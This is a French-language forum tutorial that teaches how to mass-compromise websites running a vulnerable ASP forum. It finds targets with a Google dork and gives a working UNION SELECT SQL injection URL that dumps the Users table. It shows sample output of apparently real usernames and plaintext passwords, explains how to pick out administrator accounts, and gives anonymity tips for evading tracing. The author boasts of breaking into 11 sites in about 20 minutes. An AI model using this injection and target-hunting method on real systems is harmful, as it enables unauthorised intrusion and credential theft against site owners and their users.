[size=18:c3fc6fd65c][b:c3fc6fd65c]1] Trouver un exploit[/b:c3fc6fd65c][/size:c3fc6fd65c]
Il est 07:00 du matin. Vous vous penchez par la fenetre et vous pouvez voir la farendole des grands-pere partir pour le bureau de tabac pour acheter le journal. De ce fait, les vieux de la vieille, sont toujours au courant de tout ! Une fois qu'ils ont fini de lire le journal ils vont marcher, c'est bon pour le coeur et la circulation qu'ils disent !
Moi il est 10:00, et a 07:00 je ne suis pas allez voir le spectacle qui se trame dehors ! Je vais sur www.milw0rm.com lire le journal des failles et exploits informatique. Et de ce fait, je suis toujours au courant de tout ! Une fois que j'ai fini de lire les nouveaux exploits decouverts, je vais faire du sport : c'est bon pour garder un bon mental !
Ce jour, sur Milw0rm, je fit une decouverte incroyable. Comme on en trouve pas chaques jours ! Je dirais qu'une fois par mois c'est tres largement enorme meme.
La faille en question se situe sur un programme ASP du nom de ASP.App (original...) au niveau de la page links.asp et ce via l'argument CatId.
Voici la news en question : [url]http://www.milw0rm.com/exploits/5276[/url]
[size=18:c3fc6fd65c][b:c3fc6fd65c]2] Trouver une cible[/b:c3fc6fd65c][/size:c3fc6fd65c]
Autant les renseignements generaux n'ont qu'a clique sur un bouton pour tout savoir de vous... Autant nous feront pareil, enfin presque.
Google est un moteur de recherche avec un robot... Le robot va partout ou il peut a partir du moment ou on ne lui dit pas de ne pas y aller ! De ce fait via Google vous pouvez trouver des repertoires admin/passwd.txt tres largement accessible ! :)
Mais Google dispose aussi d'un grand nombre de Hacks ou de Tricks & Tips ! Ou de Tools ! En fait on appel ca des Dorks....
Le Dorks que j'ai employe pour trouver mes cibles etait : [b:c3fc6fd65c]inurl:"links.asp?CatId"[/b:c3fc6fd65c]
Donc vous allez sur www.google.ru .... Ah niania je veux pas Google en Russe ! Rhalala..... Vous serez redirigez vers le Gogole de votre pays ! Ensuite dans le champs de recherche vous inserez le Dork... Puis vous cliquez sur recherche ou vous appuyez sur entrer (plus rapide).
[size=18:c3fc6fd65c][b:c3fc6fd65c]3] Exploiter avec l'Exploit[/b:c3fc6fd65c][/size:c3fc6fd65c]
A partir de la Google va vous afficher tous les sites qui comporteront dans leurs url "links.asp?CatId"....
Tous ces sites nous interessent puisqu'ils possedent la page vulnerable ! Cela dit, ce n'est pas pour autant que tous ces vulnerable ! ;) Rappelez-vous ASP.App l'est (c'est un forum en ASP hyper merdique...). Bon Ok, j'aime pas l'ASP mais vraiment c'est un forum tres mal fait ! Donc il ne merite que ce qu'il merite... Puis vue le nom original....
Donc on va prendre l'url d'un site au hasard :
[b:c3fc6fd65c]http://SITE/links.asp?CatId=86[/b:c3fc6fd65c]
Auquel on va lui greffer l'Injection SQL !
[b:c3fc6fd65c]http://SITE/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,
user_name,%205%20,password,null%20FROM%20Users[/b:c3fc6fd65c]
Si le site n'est pas vulnerable il ne se passera rien ou vous aurez tout simplement une erreure (OBDE ou autre). Dans ce cas passez votre chemin !
En revanche si le site est vulnerable vous aurez la liste de tous les comptes du site en question avec leurs mots de passes respectifs affiche en clair.
Vous obtiendrez quelque chose comme cela :
[i:c3fc6fd65c]Links ??? Ahmed ??? sjopbtkz ??? 1
Links ??? Ali ??? qisfsgzr ??? 1
Links ??? Andrei ??? jtfjpbfu ??? 1
Links ??? Boobs ??? vzoysyzl ??? 1
Links ??? Capone ??? kdpelepe ??? 1
Links ??? craig.pinion ??? nozone22 ??? 1
Links ??? Ivan ??? gxdbhuim ??? 1
Links ??? kristybent ??? chloe ??? 1
Links ??? Mamadshah ??? zijyhiqi ??? 1
Links ??? Master ??? ozlicwgb ??? 1
Links ??? Nick ??? tcrufxwa ??? 1
Links ??? Rock ??? ywwympvp ??? 1
Links ??? editor ??? editor ??? 2
Links ??? manager ??? manager ??? 2
Links ??? admin ??? admin ??? 3[/i:c3fc6fd65c]
Decryptons ca....
Les utilisateurs normaux ont le status 1. C'est a dire un droit de poster de lire et de voir les forums biensur...
Les moderateurs ont le status 2...
Et l'administrateur a le status 3 !!!
Le compte qui nous interesse donc est bien entendu le compte qui aura "le plus grand chiffre" ! Il se trouve toujours en bas de la liste (ordre croissant d'affichage -> a moins de modifier l'injection).
Ici nous pouvons voir admin>admin ... Login admin Mot de passe admin. C'est super securise vous avez vue ? Raison de plus pour s'introduire dans ce forum ayant un nom tres original etant fait en asp etant pas beau et ayant des utilisateurs administrateurs qui ont pour login et mot de passe le meme mot !
[size=18:c3fc6fd65c][b:c3fc6fd65c]4] Etre anonyme[/b:c3fc6fd65c][/size:c3fc6fd65c]
Une chose importante c'est d'etre anonyme au maximum... C'est a dire passer par un proxy, bloquer son http refferer, desactiver javascript et java... Malheureusement pour ce genre d'exploit les cookies doivent absolument etre active !
Je prepare un article sur l'anonymat, patientez un peu ! ;)
[size=18:c3fc6fd65c][b:c3fc6fd65c]5] Combien de site ai-je compromis ?[/b:c3fc6fd65c][/size:c3fc6fd65c]
Vous rigolez ? Je ne vais quand meme pas citer la liste des sites ! :)
Mais pour vous donner une idee j'en ai compromis 11 en l'espace de 15 a 20min.